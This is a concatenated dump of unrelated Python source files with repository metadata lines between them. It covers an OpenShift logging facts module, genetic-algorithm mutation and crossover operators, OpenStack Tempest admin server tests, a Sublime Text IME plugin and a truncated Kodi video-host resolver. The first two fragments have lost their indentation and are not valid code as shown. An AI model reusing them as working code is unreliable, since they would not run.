return "fluentd"
else:
return None
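    # Illustrative mapping derived from the prefixes above:
    #   'logging-kibana-ops-1-abcde'  -> 'kibana_ops'
    #   'logging-es-data-master-xyz'  -> 'elasticsearch'
    #   'logging-curator-1-deploy'    -> 'curator'
    # Any name that matches none of the prefixes maps to None.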
def build_facts(self):
''' Builds the logging facts and returns them '''
self.facts_for_routes(self.namespace)
self.facts_for_daemonsets(self.namespace)
self.facts_for_deploymentconfigs(self.namespace)
self.facts_for_services(self.namespace)
self.facts_for_configmaps(self.namespace)
self.facts_for_sccs()
self.facts_for_oauthclients(self.namespace)
self.facts_for_clusterrolebindings(self.namespace)
self.facts_for_rolebindings(self.namespace)
self.facts_for_secrets(self.namespace)
self.facts_for_pvcs(self.namespace)
return self.facts
def main():
''' The main method '''
module = AnsibleModule( # noqa: F405
argument_spec=dict(
admin_kubeconfig={"default": "/etc/origin/master/admin.kubeconfig", "type": "str"},
oc_bin={"required": True, "type": "str"},
openshift_logging_namespace={"required": True, "type": "str"}
),
supports_check_mode=False
)
try:
cmd = OpenshiftLoggingFacts(module, module.params['oc_bin'], module.params['admin_kubeconfig'],
module.params['openshift_logging_namespace'])
module.exit_json(
ansible_facts={"openshift_logging_facts": cmd.build_facts()}
)
# ignore broad-except error to avoid stack trace to ansible user
# pylint: disable=broad-except
except Exception as error:
module.fail_json(msg=str(error))
if __name__ == '__main__':
main()
| apache-2.0 | 8,371,110,768,455,680,000 | 41.473239 | 120 | 0.582239 | false |
crazyskady/ai-game-python | Chapter05/Improvement.py | 1 | 4989 | # -*- coding: utf-8 -*-
import random
MUTATION_RATE = 0.2
def ChooseSection(max_span, min_span):
beg = random.randint(0, max_span-min_span)
end = random.randint(min_span + beg, max_span)
return beg, end
# Scramble mutation (SM)
# 1. Randomly pick a pair of positions on the chromosome
# 2. Randomly swap the genes lying between the two positions
def MutateSM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
span = end - beg
NumberOfSwapsRqd = span - 1
while NumberOfSwapsRqd != 0:
idx1 = beg + random.randint(0, span)
idx2 = beg + random.randint(0, span)
chromo[idx1], chromo[idx2] = chromo[idx2], chromo[idx1]
NumberOfSwapsRqd = NumberOfSwapsRqd - 1
return chromo
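# Worked example (illustrative): with chromo = [1, 2, 3, 4, 5, 6, 7, 8] the
# scramble mutation might pick the span (2, 6) and shuffle only the genes at
# those indices, returning e.g. [1, 2, 6, 4, 7, 3, 5, 8]; genes outside the
# chosen span are never touched.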
# Displacement mutation (DM)
# 1. Randomly pick a pair of positions on the chromosome
# 2. Move the whole section between the two positions to a random spot in the remaining chromosome
def MutateDM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheLeft = chromo[:beg] + chromo[end:]
    randPos = random.randint(0, len(TheLeft) - 1)  # randint raises an error if len(TheLeft) == 0
newChromo = TheLeft[:randPos] + TheSection + TheLeft[randPos:]
return newChromo
# Insertion mutation (IM)
# 1. Randomly pick one gene
# 2. Insert the picked gene at another random position in the chromosome
def MutateIM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
selectedPos = random.randint(0, len(chromo) - 1)
selectedGen = [chromo[selectedPos]]
newChromo = chromo[:selectedPos] + chromo[(selectedPos + 1) :]
    newPos = random.randint(0, len(newChromo))  # e.g. for [1,2,3] there are 4 slots where the new gene can go
return newChromo[:newPos] + selectedGen + newChromo[newPos:]
# Inversion mutation (RM)
# 1. Randomly pick a pair of positions on the chromosome
# 2. Reverse the genes lying between the two positions
def MutateRM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheSection.reverse()
return chromo[:beg] + TheSection + chromo[end:]
# Inverted displacement mutation (RDM)
# 1. Randomly pick a pair of positions on the chromosome
# 2. Reverse the genes lying between the two positions
# 3. Insert the reversed section at a random position elsewhere in the chromosome
def MutateRDM(chromo):
#if random.random() > MUTATION_RATE:
#return chromo
MinSpanSize = 3
beg, end = ChooseSection(len(chromo) - 1, MinSpanSize)
TheSection = chromo[beg:end]
TheSection.reverse()
TheLeft = chromo[:beg] + chromo[end:]
    randPos = random.randint(0, len(TheLeft) - 1)  # randint raises an error if len(TheLeft) == 0
newChromo = TheLeft[:randPos] + TheSection + TheLeft[randPos:]
return newChromo
#print MutateRDM([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])
#for i in xrange(100000):
#MutateRDM([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15])
#############################################################################################################
import copy
# Order-based crossover operator (OBX)
# 1. Randomly pick two or more positions, e.g. with mum=[1,2,3,4,5] and dad=[5,4,3,2,1],
#    picking positions (2,3) selects [3,4] from mum and [3,2] from dad
# 2. In each offspring, the selected genes are rearranged to follow the order in which
#    they appear in the other parent, while all remaining genes stay in place
def CrossoverOBX(mum, dad):
baby1 = copy.deepcopy(mum)
baby2 = copy.deepcopy(dad)
tempGens = []
Positions = []
    Pos = random.randint(0, len(mum) - 2)  # randomly pick the first position
while Pos < len(mum):
Positions.append(Pos)
tempGens.append(mum[Pos])
Pos += random.randint(1, len(mum)-Pos)
#print "Pos :", Positions
#print "City:", tempGens
cPos = 0
for idx, gen in enumerate(baby2):
for idx1, gen1 in enumerate(tempGens):
if gen == gen1:
#print "idx: ", idx, "city before:", baby2[idx], "city after:", tempGens[cPos]
baby2[idx] = tempGens[cPos]
cPos += 1
break
tempGens = []
for idx in xrange(len(Positions)):
tempGens.append(dad[Positions[idx]])
cPos = 0
for idx, gen in enumerate(baby1):
for idx1, gen1 in enumerate(tempGens):
if gen == gen1:
baby1[idx] = tempGens[cPos]
cPos += 1
break
return baby1, baby2
# Position-based crossover operator (PBX)
def CrossoverPBX(mum, dad):
Positions = []
tempGens = []
    Pos = random.randint(0, len(mum) - 2)  # randomly pick the first position
while Pos < len(mum):
Positions.append(Pos)
tempGens.append(mum[Pos])
Pos += random.randint(1, len(mum)-Pos)
#print Positions, tempGens
baby1 = []
for i in xrange(len(dad)):
if i in Positions:
baby1.append(mum[i])
if dad[i] not in tempGens:
baby1.append(dad[i])
baby2 = []
tempGens = []
for idx in xrange(len(Positions)):
tempGens.append(dad[Positions[idx]])
for i in xrange(len(mum)):
if i in Positions:
baby2.append(dad[i])
if mum[i] not in tempGens:
baby2.append(mum[i])
return baby1, baby2
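# Hedged usage sketch: both crossover operators take two parent tours and return
# two offspring of the same length that are permutations of the same genes, e.g.
#
#     baby1, baby2 = CrossoverPBX([1, 2, 3, 4, 5], [5, 4, 3, 2, 1])
#
# The offspring differ between calls because the positions are chosen at random.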
if __name__ == "__main__":
#print CrossoverPBX([1,2,3,4,5,6,7,8,9], [9,8,7,6,5,4,3,2,1])
for i in xrange(100000):
CrossoverPBX([1,2,3,4,5,6,7,8,9], [9,8,7,6,5,4,3,2,1]) | mit | -2,734,002,503,878,678,000 | 22.089005 | 109 | 0.655251 | false |
roopali8/tempest | tempest/api/compute/admin/test_servers.py | 6 | 8750 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest_lib import decorators
from tempest.api.compute import base
from tempest.common import fixed_network
from tempest import test
class ServersAdminTestJSON(base.BaseV2ComputeAdminTest):
"""
Tests Servers API using admin privileges
"""
_host_key = 'OS-EXT-SRV-ATTR:host'
@classmethod
def setup_clients(cls):
super(ServersAdminTestJSON, cls).setup_clients()
cls.client = cls.os_adm.servers_client
cls.non_admin_client = cls.servers_client
cls.flavors_client = cls.os_adm.flavors_client
@classmethod
def resource_setup(cls):
super(ServersAdminTestJSON, cls).resource_setup()
cls.s1_name = data_utils.rand_name('server')
server = cls.create_test_server(name=cls.s1_name,
wait_until='ACTIVE')
cls.s1_id = server['id']
cls.s2_name = data_utils.rand_name('server')
server = cls.create_test_server(name=cls.s2_name,
wait_until='ACTIVE')
cls.s2_id = server['id']
@test.idempotent_id('51717b38-bdc1-458b-b636-1cf82d99f62f')
def test_list_servers_by_admin(self):
# Listing servers by admin user returns empty list by default
body = self.client.list_servers_with_detail()
servers = body['servers']
self.assertEqual([], servers)
@test.idempotent_id('06f960bb-15bb-48dc-873d-f96e89be7870')
def test_list_servers_filter_by_error_status(self):
# Filter the list of servers by server error status
params = {'status': 'error'}
self.client.reset_state(self.s1_id, state='error')
body = self.non_admin_client.list_servers(params)
# Reset server's state to 'active'
self.client.reset_state(self.s1_id, state='active')
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
servers = body['servers']
# Verify error server in list result
self.assertIn(self.s1_id, map(lambda x: x['id'], servers))
self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers))
@test.idempotent_id('9f5579ae-19b4-4985-a091-2a5d56106580')
def test_list_servers_by_admin_with_all_tenants(self):
# Listing servers by admin user with all tenants parameter
# Here should be listed all servers
params = {'all_tenants': ''}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
servers_name = map(lambda x: x['name'], servers)
self.assertIn(self.s1_name, servers_name)
self.assertIn(self.s2_name, servers_name)
@test.idempotent_id('7e5d6b8f-454a-4ba1-8ae2-da857af8338b')
def test_list_servers_by_admin_with_specified_tenant(self):
# In nova v2, tenant_id is ignored unless all_tenants is specified
# List the primary tenant but get nothing due to odd specified behavior
tenant_id = self.non_admin_client.tenant_id
params = {'tenant_id': tenant_id}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
self.assertEqual([], servers)
# List the admin tenant which has no servers
admin_tenant_id = self.client.tenant_id
params = {'all_tenants': '', 'tenant_id': admin_tenant_id}
body = self.client.list_servers_with_detail(params)
servers = body['servers']
self.assertEqual([], servers)
@test.idempotent_id('86c7a8f7-50cf-43a9-9bac-5b985317134f')
def test_list_servers_filter_by_exist_host(self):
# Filter the list of servers by existent host
name = data_utils.rand_name('server')
flavor = self.flavor_ref
image_id = self.image_ref
network = self.get_tenant_network()
network_kwargs = fixed_network.set_networks_kwarg(network)
test_server = self.client.create_server(name, image_id, flavor,
**network_kwargs)
self.addCleanup(self.client.delete_server, test_server['id'])
self.client.wait_for_server_status(test_server['id'], 'ACTIVE')
server = self.client.show_server(test_server['id'])
self.assertEqual(server['status'], 'ACTIVE')
hostname = server[self._host_key]
params = {'host': hostname}
body = self.client.list_servers(params)
servers = body['servers']
nonexistent_params = {'host': 'nonexistent_host'}
nonexistent_body = self.client.list_servers(nonexistent_params)
nonexistent_servers = nonexistent_body['servers']
self.assertIn(test_server['id'], map(lambda x: x['id'], servers))
self.assertNotIn(test_server['id'],
map(lambda x: x['id'], nonexistent_servers))
@test.idempotent_id('ee8ae470-db70-474d-b752-690b7892cab1')
def test_reset_state_server(self):
# Reset server's state to 'error'
self.client.reset_state(self.s1_id)
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ERROR')
# Reset server's state to 'active'
self.client.reset_state(self.s1_id, state='active')
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
@decorators.skip_because(bug="1240043")
@test.idempotent_id('31ff3486-b8a0-4f56-a6c0-aab460531db3')
def test_get_server_diagnostics_by_admin(self):
# Retrieve server diagnostics by admin user
diagnostic = self.client.get_server_diagnostics(self.s1_id)
basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop',
'tx_packets', 'tx_errors', 'tx_drop',
'read_req', 'write_req', 'cpu', 'memory']
for key in basic_attrs:
self.assertIn(key, str(diagnostic.keys()))
@test.idempotent_id('682cb127-e5bb-4f53-87ce-cb9003604442')
def test_rebuild_server_in_error_state(self):
# The server in error state should be rebuilt using the provided
# image and changed to ACTIVE state
# resetting vm state require admin privilege
self.client.reset_state(self.s1_id, state='error')
rebuilt_server = self.non_admin_client.rebuild(
self.s1_id, self.image_ref_alt)
self.addCleanup(self.non_admin_client.wait_for_server_status,
self.s1_id, 'ACTIVE')
self.addCleanup(self.non_admin_client.rebuild, self.s1_id,
self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.s1_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
self.non_admin_client.wait_for_server_status(rebuilt_server['id'],
'ACTIVE',
raise_on_error=False)
# Verify the server properties after rebuilding
server = self.non_admin_client.show_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
@test.idempotent_id('7a1323b4-a6a2-497a-96cb-76c07b945c71')
def test_reset_network_inject_network_info(self):
# Reset Network of a Server
server = self.create_test_server(wait_until='ACTIVE')
self.client.reset_network(server['id'])
# Inject the Network Info into Server
self.client.inject_network_info(server['id'])
@test.idempotent_id('fdcd9b33-0903-4e00-a1f7-b5f6543068d6')
def test_create_server_with_scheduling_hint(self):
# Create a server with scheduler hints.
hints = {
'same_host': self.s1_id
}
self.create_test_server(sched_hints=hints,
wait_until='ACTIVE')
| apache-2.0 | 1,860,584,231,885,031,200 | 42.969849 | 79 | 0.631886 | false |
koery/win-sublime | Data/Packages/IMESupport/imesupportplugin.py | 1 | 18485 | # -*- coding: utf-8 -*-
import sublime
import sublime_plugin
import math
try:
from imesupport.sublime_utility import fix_cloned_view
except ImportError:
from .imesupport.sublime_utility import fix_cloned_view
import ctypes
from ctypes import windll, byref
from ctypes import Structure, c_ulong
from ctypes.wintypes import RECT, POINT
from ctypes.wintypes import BYTE, LONG
WM_IME_STARTCOMPOSITION = 269
WM_IME_ENDCOMPOSITION = 270
WM_IME_COMPOSITION = 271
GWL_STYLE = (-16)
WS_OVERLAPPED = 0
WS_POPUP = -2147483648
WS_CHILD = 1073741824
WS_MINIMIZE = 536870912
WS_VISIBLE = 268435456
WS_DISABLED = 134217728
WS_CLIPSIBLINGS = 67108864
WS_CLIPCHILDREN = 33554432
WS_MAXIMIZE = 16777216
WS_CAPTION = 12582912
WS_BORDER = 8388608
WS_DLGFRAME = 4194304
WS_VSCROLL = 2097152
WS_HSCROLL = 1048576
WS_SYSMENU = 524288
WS_THICKFRAME = 262144
WS_GROUP = 131072
WS_TABSTOP = 65536
WS_MINIMIZEBOX = 131072
WS_MAXIMIZEBOX = 65536
def add(a, b):
return (a[0] + b[0], a[1] + b[1])
def sub(a, b):
return (a[0] - b[0], a[1] - b[1])
def mul(a, b):
return (a[0] * b[0], a[1] * b[1])
class COMPOSITIONFORM(Structure):
_fields_ = [
('dwStyle', c_ulong),
('ptCurrentPos', POINT),
('rcArea', RECT),
]
# from http://d.hatena.ne.jp/pipehead/20071210
import sys
(major, platform) = sys.getwindowsversion()[0:4:3]
winNT5OrLater = (platform == 2) and (major >= 5)
LF_FACESIZE = 32
class c_tchar(ctypes._SimpleCData):
if winNT5OrLater:
_type_ = 'u' # c_wchar
else:
_type_ = 'c' # c_char
class LOGFONT(Structure):
_fields_ = [
('lfHeight', LONG),
('lfWidth', LONG),
('lfEscapement', LONG),
('lfOrientation', LONG),
('lfWeight', LONG),
('lfItalic', BYTE),
('lfUnderline', BYTE),
('lfStrikeOut', BYTE),
('lfCharSet', BYTE),
('lfOutPrecision', BYTE),
('lfClipPrecision', BYTE),
('lfQuality', BYTE),
('lfPitchAndFamily', BYTE),
('lfFaceName', c_tchar * LF_FACESIZE)
]
window_style_bits = {
'WS_POPUP': WS_POPUP,
'WS_CHILD': WS_CHILD,
'WS_MINIMIZE': WS_MINIMIZE,
'WS_VISIBLE': WS_VISIBLE,
'WS_DISABLED': WS_DISABLED,
'WS_CLIPSIBLINGS': WS_CLIPSIBLINGS,
'WS_CLIPCHILDREN': WS_CLIPCHILDREN,
'WS_MAXIMIZE': WS_MAXIMIZE,
'WS_CAPTION': WS_CAPTION,
'WS_BORDER': WS_BORDER,
'WS_DLGFRAME': WS_DLGFRAME,
'WS_VSCROLL': WS_VSCROLL,
'WS_HSCROLL': WS_HSCROLL,
'WS_SYSMENU': WS_SYSMENU,
'WS_THICKFRAME': WS_THICKFRAME,
'WS_GROUP': WS_GROUP,
'WS_TABSTOP': WS_TABSTOP,
'WS_MINIMIZEBOX': WS_MINIMIZEBOX,
'WS_MAXIMIZEBOX': WS_MAXIMIZEBOX,
}
def get_window_style(hwnd):
style = ctypes.windll.user32.GetWindowLongW(hwnd, GWL_STYLE)
ret = []
for name, bit in window_style_bits.items():
if (style & bit) != 0:
ret.append(name)
return ret
def is_fullscreen(hwnd):
style = get_window_style(hwnd)
return 'WS_BORDER' not in style
def is_ime_opened(hwnd, status):
hIMC = ctypes.windll.imm32.ImmGetContext(hwnd)
try:
return bool(ctypes.windll.imm32.ImmGetOpenStatus(hIMC))
finally:
ctypes.windll.imm32.ImmReleaseContext(hwnd, hIMC)
def set_ime_status(hwnd, status):
hIMC = ctypes.windll.imm32.ImmGetContext(hwnd)
try:
if status == True: # IME on
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0)
elif status == False: # IME off
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 1)
elif status == 'toggle': # IME toggle
status = ctypes.windll.imm32.ImmGetOpenStatus(hIMC)
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0 if status else 1)
finally:
ctypes.windll.imm32.ImmReleaseContext(hwnd, hIMC)
def set_inline_position(hwnd, x, y, font_face, font_height):
# borrowed from http://d.hatena.ne.jp/doloopwhile/20090627/1275176169
hIMC = windll.imm32.ImmGetContext(hwnd)
status = windll.imm32.ImmGetOpenStatus(hIMC)
if not status:
        # Enable IME temporarily.
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 1)
pt = POINT(x, y)
cf = COMPOSITIONFORM()
cf.dwStyle = 2 # CFS_POINT
cf.ptCurrentPos = pt
# Supporting Weasel IME
# For more detail see also WeaselIME.cpp@WeaselIME::_SetCompositionWindow
cf.rcArea.left = x
cf.rcArea.top = y
if x == 0:
cf.rcArea.left = 1
if y == 0:
cf.rcArea.top = 1
cf.rcArea.right = cf.rcArea.left
cf.rcArea.bottom = cf.rcArea.top
windll.imm32.ImmSetCompositionWindow(hIMC, byref(cf))
lf = LOGFONT()
lf.lfHeight = font_height
lf.lfFaceName = font_face
windll.imm32.ImmSetCompositionFontW(hIMC, byref(lf))
if not status:
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0)
windll.imm32.ImmReleaseContext(hwnd, hIMC)
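# Hedged usage sketch (all concrete values are made up for illustration): move
# the IME composition window of the active Sublime Text window to client
# coordinates (120, 240) and render it with a 16 px 'Meiryo' font.
#
#     hwnd = sublime.active_window().hwnd()
#     set_inline_position(hwnd, 120, 240, 'Meiryo', 16)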
class WindowLayout(object):
def __init__(self, window):
self.window = window
self.last_extents = None
self.settings = sublime.load_settings('IMESupport.sublime-settings')
def calc_cursor_position(self, view, cursor):
abspoint = view.text_to_layout(cursor)
offset = view.viewport_position()
p = sub(abspoint, offset)
offset = self.calc_offset(self.window, view)
if self.side_bar['visible']:
offset[0].append(self.side_bar['width'])
offset[0].append(self.get_setting('imesupport_offset_x'))
offset[1].append(self.get_setting('imesupport_offset_y'))
p = add(p, (sum(offset[0]), sum(offset[1])))
if self.get_setting('imesupport_debug'):
sublime.status_message('IMESupport: ' + str(p) + repr(offset))
font_face, font_height = self.get_font_info(view)
return (int(p[0]), int(p[1]), font_face, font_height)
def get_widget_cursor_position(self, view, cursor):
font_face, font_height = self.get_font_info(view)
# FIXME Is there a way to get cursor position of widget view?
return (0, 0, font_face, font_height)
@staticmethod
def get_font_info(view):
font_face = view.settings().get('font_face', '')
font_height = int(view.line_height())
font_height -= (view.settings().get("line_padding_top", 0)
+ view.settings().get("line_padding_bottom", 0))
return (font_face, font_height)
def update_status(self, view=None):
extents = self.get_extent_list(self.window)
if extents == self.last_extents:
return # layout is not changed.
self.last_extents = extents
# Get status.
self.get_status(view)
def get_status(self, view=None):
window = self.window
if view is None:
view = window.active_view()
if view is None:
return None
self.tabs = self.tabs_status(window, view)
self.distraction_free = self.distraction_free_status(window)
self.split_group = self.split_group_status(window)
# Requires distraction_free
line_numbers = self.line_numbers_status(view)
hscroll_bar = self.hscroll_bar_status(view)
# Requires minimap
self.side_bar = self.side_bar_status(window, view)
return {
'em_width': view.em_width(),
'tabs': self.tabs,
'distraction_free': self.distraction_free,
'split_group': self.split_group,
'line_numbers': line_numbers,
'hscroll_bar': hscroll_bar,
'side_bar': self.side_bar,
}
def get_setting(self, key, default=None):
return self.settings.get(key, default)
def calc_offset(self, window, view):
group, _ = window.get_view_index(view)
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
g2d = self.make_list2d(self.get_group_list(window), c)
row, col = self.get_group_rowcol(layout, group)
offset = [[], []]
offset[0] += self.calc_group_offset_width(g2d, col)
offset[1] += self.calc_group_offset_height(g2d, row)
offset[0] += self.calc_view_width_offset(view)
offset[1] += self.calc_view_height_offset(view)
return offset
def split_group_status(self, window):
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
views = self.get_group_list(window)
non_view = {'visible': False, 'width': 0}
minimaps = [
self.minimap_status(window, view) if view is not None else non_view
for view in views]
groups = [{'minimap': minimap} for minimap in minimaps]
return self.make_list2d(groups, c)
def side_bar_status(self, window, view):
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
g2d = self.make_list2d(self.get_group_list(window), c)
all_views_width = sum(self.calc_group_offset_width(g2d, c))
rect = RECT()
windll.user32.GetClientRect(c_ulong(window.hwnd()), byref(rect))
width = rect.right - all_views_width
if width < 0:
width = 0
return {'visible': width > 0, 'width': width}
def calc_group_offset_width(self, g2d, group_col):
r = len(g2d)
ret = []
for x in range(group_col):
for y in range(r):
if g2d[y][x] is not None:
ret += self.calc_view_width(g2d[y][x], y, x)
break
else:
if self.get_setting('imesupport_debug'):
print('WindowLayout.calc_group_offset_width: there is empty view.')
return ret
def calc_group_offset_height(self, g2d, group_row):
c = len(g2d[0])
ret = []
for y in range(group_row):
for x in range(c):
if g2d[y][x] is not None:
ret += self.calc_view_height(g2d[y][x])
break
else:
if self.get_setting('imesupport_debug'):
print('WindowLayout.calc_group_offset_height: there is empty view.')
return ret
def calc_view_width_offset(self, view):
if self.distraction_free['status']:
extent = view.viewport_extent()
layout = view.layout_extent()
min_width = self.get_setting('imesupport_view_left_distraction_free_width')
left_width = max(extent[0] - layout[0], min_width) / 2
left_width += 4
else:
left_width = self.get_setting('imesupport_view_left_icon_width')
line_numbers = self.line_numbers_status(view)
return [
left_width,
(line_numbers['width'] if line_numbers['visible'] else 0)
]
def calc_view_width(self, view, row, col):
minimap = self.split_group[row][col]['minimap']
return self.calc_view_width_offset(view) + [
view.viewport_extent()[0],
(minimap['width'] if minimap['visible'] else 0),
self.get_setting('imesupport_view_right_vscroll_width')
]
def calc_view_height_offset(self, view):
return [self.tabs['height'] if self.tabs['visible'] else 0]
def calc_view_height(self, view):
hscroll_bar = self.hscroll_bar_status(view)
return self.calc_view_height_offset(view) + [
view.viewport_extent()[1],
(hscroll_bar['height'] if hscroll_bar['visible'] else 0)
]
def line_numbers_status(self, view):
# NOTE line numbers is always hidden on Distraction Free Mode.
if self.distraction_free['status']:
# print(imesupportplugin.WindowLayout.line_numbers_status(window.active_view_in_group(0)))
return {'visible': False, 'width': 0, 'mode': 'distraction_free'}
else:
visible = view.settings().get('line_numbers')
width = (WindowLayout.calc_line_numbers_width(view) + 3
if visible else 0)
return {'visible': visible, 'width': width, 'mode': 'calc'}
def hscroll_bar_status(self, view):
word_wrap = view.settings().get('word_wrap')
extent = view.viewport_extent()
layout = view.layout_extent()
diff = layout[0] - extent[0]
return {
'visible': diff > 0 and word_wrap != True,
'height': self.get_setting('imesupport_view_bottom_hscroll_height'),
# 'diff': self.hscroll_bar_diff(view),
}
@staticmethod
def get_group_list(window):
return [window.active_view_in_group(g) for g in range(window.num_groups())]
@staticmethod
def get_extent_list(window):
view_groups = [window.active_view_in_group(g) for g in range(window.num_groups())]
return [None if v is None else v.viewport_extent() for v in view_groups]
@staticmethod
def tabs_status(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_tabs')
extent2 = view.viewport_extent()
window.run_command('toggle_tabs')
diff = extent2[1] - extent1[1]
return {'visible': diff > 0, 'height': abs(diff)}
@staticmethod
def minimap_status(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_minimap')
extent2 = view.viewport_extent()
window.run_command('toggle_minimap')
diff = extent2[0] - extent1[0]
return {'visible': diff > 0, 'width': abs(diff)}
@staticmethod
def is_side_bar_visible(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_side_bar')
extent2 = view.viewport_extent()
window.run_command('toggle_side_bar')
diff = extent2[0] - extent1[0]
# NOTE Cannot use diff for side_bar width.
return {'visible': diff > 0}
@staticmethod
def distraction_free_status(window):
""" Detecte Distraction Free Mode. """
return {'status': is_fullscreen(window.hwnd())}
@staticmethod
def line_numbers_diff(view):
# FIXME Cannot get with non-active group.
visible = view.settings().get('line_numbers')
extent1 = view.viewport_extent()
view.settings().set('line_numbers', not visible)
extent2 = view.viewport_extent()
view.settings().set('line_numbers', visible)
return extent2[0] - extent1[0]
@staticmethod
def hscroll_bar_diff(view):
# FIXME Cannot get with non-active group.
word_wrap = view.settings().get('word_wrap')
# Make hscroll bar visible if line is longer than viewport.
view.settings().set('word_wrap', False)
extent1 = view.viewport_extent()
# Hide hscroll bar.
view.settings().set('word_wrap', True)
extent2 = view.viewport_extent()
view.settings().set('word_wrap', word_wrap)
diff = extent2[1] - extent1[1]
return {'visible': diff > 0, 'height': abs(diff)}
@staticmethod
def get_layout_rowcol(layout):
c = len(layout['cols']) - 1
r = len(layout['rows']) - 1
return (r, c)
@staticmethod
def get_group_rowcol(layout, group):
c = len(layout['cols']) - 1
return (group // c, group % c)
@staticmethod
def make_list2d(lst, cols):
assert (len(lst) % cols) == 0
return [lst[i * cols:(i + 1) * cols] for i in range(len(lst) // cols)]
@staticmethod
def get_number_column(n):
return int(math.log10(n)) + 1
@staticmethod
def calc_line_numbers_width(view):
lines, _ = view.rowcol(view.size())
c = WindowLayout.get_number_column(lines + 1)
return c * view.em_width()
class ImeSupportEventListener(sublime_plugin.EventListener):
def __init__(self):
self.layouts = {}
self.initialized = False
def on_activated(self, view):
self.update(view)
@fix_cloned_view
def on_selection_modified(self, view):
self.update(view)
def update(self, view):
if not self.initialized:
setup()
self.initialized = True
if view is None:
return
window = view.window()
if window is None:
return
id = window.id()
if id not in self.layouts:
self.layouts[id] = WindowLayout(window)
if view.settings().get('is_widget'):
pos = self.layouts[id].get_widget_cursor_position(view, view.sel()[0].a)
else:
self.layouts[id].update_status(view)
pos = self.layouts[id].calc_cursor_position(view, view.sel()[0].a)
set_pos(window.hwnd(), pos)
class ImeSupportGetMeasureCommand(sublime_plugin.WindowCommand):
def run(self):
self.test(self.window, self.window.active_view())
@staticmethod
def test(window, view):
print('ImeSupportGetMeasureCommand:')
for k, v in WindowLayout(window).get_status().items():
print(k + ': ' + str(v))
if sublime.load_settings('IMESupport.sublime-settings').get('imesupport_debug'):
class _WindowLayoutTestEventListener(sublime_plugin.EventListener):
def __init__(self):
window = sublime.active_window()
if window is None:
return
view = window.active_view()
if view is None:
return
ImeSupportGetMeasureCommand.test(window, view)
class ImeSupportSetImeStatusCommand(sublime_plugin.TextCommand):
def run(self, edit, status):
set_ime_status(self.view.window().hwnd(), status)
try:
from imesupport import globalhook
except ImportError:
from .imesupport import globalhook
# def unload_handler():
# print('ImeSupport: unload')
# globalhook.term()
def setup():
if int(sublime.version()) < 3000:
# Sublime Text 2 & Python 2.6
pass
else:
# Sublime Text 3 & Python 3.3
globalhook.setup(sublime.arch() == 'x64')
def set_pos(hwnd, pos):
if int(sublime.version()) < 3000:
set_pos_st2(hwnd, pos)
else:
set_pos_st3(hwnd, pos)
def set_pos_st2(hwnd, pos):
# set position directly here. (Not handle IME messages.)
set_inline_position(hwnd, *pos)
def set_pos_st3(hwnd, pos):
globalhook.set_inline_position(hwnd, *pos)
| mit | -7,997,261,403,739,738,000 | 30.598291 | 102 | 0.593995 | false |
noba3/KoTos | addons/plugin.video.phstreams/resources/lib/resolvers/grifthost.py | 3 | 2065 | # -*- coding: utf-8 -*-
'''
Genesis Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib
from resources.lib.libraries import client
from resources.lib.libraries import jsunpack
def resolve(url):
try:
headers = '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': url})
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://grifthost.com/embed-%s.html' % url
result = client.request(url)
try:
post = {}
f = client.parseDOM(result, 'Form', attrs = {'method': 'POST'})[0]
f = f.replace('"submit"', '"hidden"')
k = client.parseDOM(f, 'input', ret='name', attrs = {'type': 'hidden'})
